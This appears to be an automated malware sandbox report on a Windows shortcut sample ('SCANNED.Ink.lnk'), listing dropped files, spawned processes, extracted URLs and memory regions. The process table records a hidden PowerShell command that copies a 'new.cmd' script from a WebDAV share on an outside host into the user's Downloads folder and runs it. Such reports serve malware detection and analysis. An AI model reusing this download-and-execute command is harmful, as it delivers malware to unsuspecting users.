Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SCANNED.Ink.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=1, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06
2018, length=446976, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okj1m1nk.ho0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyzsgb5d.j2j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\COXPMAZREWI46YJA5PXF.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b0af348238f4e71f.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\new.cmd'
\"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\new.cmd\" -WindowStyle Hidden"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 3 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DBAB228000
|
heap
|
page read and write
|
||
|
2DB90EC1000
|
heap
|
page read and write
|
||
|
2DBAAF5A000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
2DB94648000
|
trusted library allocation
|
page read and write
|
||
|
2DB90DC0000
|
heap
|
page read and write
|
||
|
2DB928C0000
|
heap
|
page readonly
|
||
|
2DBAB1C5000
|
heap
|
page read and write
|
||
|
2DB9464E000
|
trusted library allocation
|
page read and write
|
||
|
2DB928B0000
|
trusted library allocation
|
page read and write
|
||
|
2DB94977000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2DBAAF5C000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
DDA89F7000
|
stack
|
page read and write
|
||
|
2DBA2E84000
|
trusted library allocation
|
page read and write
|
||
|
DDA81EF000
|
stack
|
page read and write
|
||
|
2DB946F5000
|
trusted library allocation
|
page read and write
|
||
|
DDA8BFE000
|
stack
|
page read and write
|
||
|
2DB92E9B000
|
trusted library allocation
|
page read and write
|
||
|
2DB94293000
|
trusted library allocation
|
page read and write
|
||
|
2DB90EBA000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB928D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB21D000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
2DBAAF56000
|
heap
|
page read and write
|
||
|
DDA867B000
|
stack
|
page read and write
|
||
|
DDA8A7F000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB90E47000
|
heap
|
page read and write
|
||
|
7DF4ECF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
2DB947E4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
DDA84FE000
|
stack
|
page read and write
|
||
|
2DB92920000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
2DB92DD0000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
DDA85FE000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
2DB927B5000
|
heap
|
page read and write
|
||
|
DDA81A5000
|
stack
|
page read and write
|
||
|
2DB90EBF000
|
heap
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB01E000
|
heap
|
page read and write
|
||
|
2DB9442A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB90E8A000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB1C9000
|
heap
|
page read and write
|
||
|
DDA8979000
|
stack
|
page read and write
|
||
|
2DBAB000000
|
heap
|
page read and write
|
||
|
2DB94650000
|
trusted library allocation
|
page read and write
|
||
|
2DB90EF8000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
2DB90DD0000
|
heap
|
page read and write
|
||
|
2DB9466F000
|
trusted library allocation
|
page read and write
|
||
|
2DB90EF6000
|
heap
|
page read and write
|
||
|
2DBAAF54000
|
heap
|
page read and write
|
||
|
2DB90EAE000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB1B7000
|
heap
|
page execute and read and write
|
||
|
2DB94A3C000
|
trusted library allocation
|
page read and write
|
||
|
DDA87FD000
|
stack
|
page read and write
|
||
|
2DBAAF9A000
|
heap
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB20A000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
2DB9469A000
|
trusted library allocation
|
page read and write
|
||
|
DDA847E000
|
stack
|
page read and write
|
||
|
2DBA2E11000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB1C0000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
2DBAAF20000
|
heap
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
DDA8AFE000
|
stack
|
page read and write
|
||
|
2DB93F91000
|
trusted library allocation
|
page read and write
|
||
|
2DB94A40000
|
trusted library allocation
|
page read and write
|
||
|
2DB926B0000
|
heap
|
page read and write
|
||
|
2DB90DC5000
|
heap
|
page read and write
|
||
|
2DB90E8C000
|
heap
|
page read and write
|
||
|
2DB90CC0000
|
heap
|
page read and write
|
||
|
2DB90DA0000
|
heap
|
page read and write
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DBAB040000
|
heap
|
page read and write
|
||
|
2DB93042000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
2DB943E3000
|
trusted library allocation
|
page read and write
|
||
|
2DB90EB1000
|
heap
|
page read and write
|
||
|
2DB93A42000
|
trusted library allocation
|
page read and write
|
||
|
DDA964E000
|
stack
|
page read and write
|
||
|
2DB92880000
|
trusted library allocation
|
page read and write
|
||
|
DDA88F6000
|
stack
|
page read and write
|
||
|
2DB927B0000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
DDA857D000
|
stack
|
page read and write
|
||
|
2DB90ECE000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
2DBA2FC7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
DDA8C7B000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
2DB92950000
|
heap
|
page read and write
|
||
|
DDA8878000
|
stack
|
page read and write
|
||
|
2DB90E10000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB92CD0000
|
trusted library allocation
|
page read and write
|
||
|
2DB92E00000
|
heap
|
page execute and read and write
|
||
|
2DB92E11000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB1B0000
|
heap
|
page execute and read and write
|
||
|
2DB90E95000
|
heap
|
page read and write
|
||
|
2DBA2E20000
|
trusted library allocation
|
page read and write
|
||
|
2DBAB21A000
|
heap
|
page read and write
|
||
|
DDA86FF000
|
stack
|
page read and write
|
||
|
DDA877E000
|
stack
|
page read and write
|
||
|
2DBAAE11000
|
heap
|
page read and write
|
||
|
2DB90E22000
|
heap
|
page read and write
|
||
|
2DB92CD3000
|
trusted library allocation
|
page read and write
|
There are 126 hidden memdumps, click here to show them.